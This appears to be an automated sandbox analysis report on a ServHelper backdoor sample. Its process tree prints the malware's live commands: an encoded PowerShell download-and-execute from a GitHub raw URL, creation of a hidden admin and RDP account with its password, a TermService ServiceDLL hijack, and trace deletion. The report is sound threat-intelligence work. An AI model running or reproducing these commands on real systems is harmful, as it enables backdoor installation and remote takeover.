servhelper | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

Analysis

max time kernel
138s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-10-2024 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
Size

5.9MB
MD5

472208d7ba18d4c14b7e90b9db5d6feb
SHA1

ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256

ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512

9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
SSDEEP

49152:awptF+Srb/TkvO90dL3BmAFd4A64nsfJ9KN5/Jf/LnBqOvF319Gh7TF7meaKBdZE:awNxKDmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net1.execmd.exenet.exenet1.execmd.exenet.exe

pid process

2524 net1.exe
1772 cmd.exe
1184 net.exe
1996 net1.exe
2388 cmd.exe
1464 net.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 300 powershell.exe
8 300 powershell.exe
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

1828 cmd.exe
948 net.exe
2236 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1356 takeown.exe
2960 icacls.exe
1280 icacls.exe
2220 icacls.exe
1768 icacls.exe
2188 icacls.exe
1296 icacls.exe
568 icacls.exe

pid	process
2524	net1.exe
1772	cmd.exe
1184	net.exe
1996	net1.exe
2388	cmd.exe
1464	net.exe

flow	pid	process
7	300	powershell.exe
8	300	powershell.exe

pid	process
1828	cmd.exe
948	net.exe
2236	net1.exe

pid	process
1356	takeown.exe
2960	icacls.exe
1280	icacls.exe
2220	icacls.exe
1768	icacls.exe
2188	icacls.exe
1296	icacls.exe
568	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2496
2496
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2188 icacls.exe
1296 icacls.exe
568 icacls.exe
1356 takeown.exe
2960 icacls.exe
1280 icacls.exe
2220 icacls.exe
1768 icacls.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 raw.githubusercontent.com
7 raw.githubusercontent.com
8 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2496
2496

pid	process
2188	icacls.exe
1296	icacls.exe
568	icacls.exe
1356	takeown.exe
2960	icacls.exe
1280	icacls.exe
2220	icacls.exe
1768	icacls.exe

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3Z5LBSKQ5TXRQXRERQD.temp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2860 powershell.exe
536 powershell.exe
1040 powershell.exe
300 powershell.exe
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2776 WMIC.exe

pid	process
2860	powershell.exe
536	powershell.exe
1040	powershell.exe
300	powershell.exe

pid	process
2776	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2027fc55e81edb01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2396 reg.exe
Runs net.exe

pid	process
2396	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2596	powershell.exe
2860	powershell.exe
536	powershell.exe
1040	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
300	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

480
2496
2496
2496
2496
2496

pid	process
480
2496
2496
2496
2496
2496

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2696	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeRestorePrivilege	1280	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2776	WMIC.exe
Token: SeAuditPrivilege	2776	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2776	WMIC.exe
Token: SeAuditPrivilege	2776	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeAuditPrivilege	2620	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeAuditPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	300	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2696 wrote to memory of 2596	2696	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe	powershell.exe
PID 2696 wrote to memory of 2596	2696	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe	powershell.exe
PID 2696 wrote to memory of 2596	2696	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe	powershell.exe
PID 2596 wrote to memory of 1044	2596	powershell.exe	csc.exe
PID 2596 wrote to memory of 1044	2596	powershell.exe	csc.exe
PID 2596 wrote to memory of 1044	2596	powershell.exe	csc.exe
PID 1044 wrote to memory of 1392	1044	csc.exe	cvtres.exe
PID 1044 wrote to memory of 1392	1044	csc.exe	cvtres.exe
PID 1044 wrote to memory of 1392	1044	csc.exe	cvtres.exe
PID 2596 wrote to memory of 2860	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 2860	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 2860	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 536	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 536	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 536	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 1040	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 1040	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 1040	2596	powershell.exe	powershell.exe
PID 2596 wrote to memory of 1356	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 1356	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 1356	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 2960	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2960	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2960	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1280	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1280	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1280	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2220	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2220	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2220	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1768	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1768	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1768	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2188	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2188	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2188	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1296	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1296	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1296	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 568	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 568	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 568	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2380	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2380	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2380	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2396	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2396	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2396	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 1868	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 1868	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 1868	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 884	2596	powershell.exe	net.exe
PID 2596 wrote to memory of 884	2596	powershell.exe	net.exe
PID 2596 wrote to memory of 884	2596	powershell.exe	net.exe
PID 884 wrote to memory of 2416	884	net.exe	net1.exe
PID 884 wrote to memory of 2416	884	net.exe	net1.exe
PID 884 wrote to memory of 2416	884	net.exe	net1.exe
PID 2596 wrote to memory of 2108	2596	powershell.exe	cmd.exe
PID 2596 wrote to memory of 2108	2596	powershell.exe	cmd.exe
PID 2596 wrote to memory of 2108	2596	powershell.exe	cmd.exe
PID 2108 wrote to memory of 2212	2108	cmd.exe	cmd.exe
PID 2108 wrote to memory of 2212	2108	cmd.exe	cmd.exe
PID 2108 wrote to memory of 2212	2108	cmd.exe	cmd.exe
PID 2212 wrote to memory of 540	2212	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mri3krfg.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE0F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFE0E.tmp"
      4⤵
      PID:1392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1356
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2960
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2220
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1768
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2188
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1296
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:568
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2380
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:2396
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1868
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2416
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2212
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:540
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:952
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1316
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1580
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1540
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1180
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1212

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:1828
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:2236

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0Zcu5BfV /add
1⤵
PID:688
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 0Zcu5BfV /add
  2⤵
  PID:2204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 0Zcu5BfV /add
    3⤵
    PID:1460

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1772
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1996

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" CCJBVTGQ$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2388
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" CCJBVTGQ$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" CCJBVTGQ$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2524

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1708
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2968

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0Zcu5BfV
1⤵
PID:1652
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 0Zcu5BfV
  2⤵
  PID:812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 0Zcu5BfV
    3⤵
    PID:1992

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1516
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2776

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2560
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2620

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2336
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFE0F.tmp

Filesize
1KB

MD5
8a10dd15f190dc28760f36993343ef3a

SHA1
284a9f9fed50a54ef7ee9c013ff4ea9e46c62b32

SHA256
252fc32f24ed4787ac5062348d41912d10a88341a65f5fa74134fef4e2efc8d1

SHA512
050d3c89895cf8e3fb9f62ddfdf7b0f8c6c56e21760578153337deb48736c583dd78b274caa56cf7fa736153ec0b5d35d7a6a134c223d6499cb59ba0afd87770

Download Submit
C:\Users\Admin\AppData\Local\Temp\mri3krfg.dll

Filesize
3KB

MD5
4ce946b9a67bfda57eaa98149b4ea8d6

SHA1
7f39c240edfbc57adf710a5ca56de665ea57808c

SHA256
0fdd71c9a7fe218f9aef5d889140e1be5955fc6be60d0f522659f80daaf75f91

SHA512
393a733790699934c6de0996b0b86690845fdcad40ec56635de4d74e931a5fdd1b5837c7209d3f8c36864c4606f54cfd4a7baf33424e7a07ef14d3c28926a77a

Download Submit
C:\Users\Admin\AppData\Local\Temp\mri3krfg.pdb

Filesize
7KB

MD5
a9878e40445f2a430292b3a2d408a9bf

SHA1
2c7121f6fa9b6c38669e836b17991ebd0ca7bccd

SHA256
869525d87f5910e76e051b9058a8a7f4fa9932c1538ecf69d4bf1f3da40e3395

SHA512
43a100efb81148721856785b3c5e3498e4eea4d2570bd678b1f6f27735c7224fca8a255e3a27180f3ed6490543f0db37139503b4eef6d643e9f77e391f1fcbe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
00fb904b2dd958760943b89400e9b7f9

SHA1
8c825862b6f70cbaef991525f31100f713e61e7d

SHA256
392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a

SHA512
ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28c24ee7bbd361a09c4b4a61cea9c96d

SHA1
c066100618b42cf10eced2c58ac6dc555f45b3a7

SHA256
f75d5f6fe7024aa427df72f06f7460b4355a5583e97c6ff35d742d0257fcd798

SHA512
c03ec98a76fe7e1c6e5dabf3269faa8ed094bd27d3e784c4b166266164c84a090387bbac19d304e653d1b9884fb80c9f4e0aee5d5d10e1fbf7ad9d7e038539f2

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
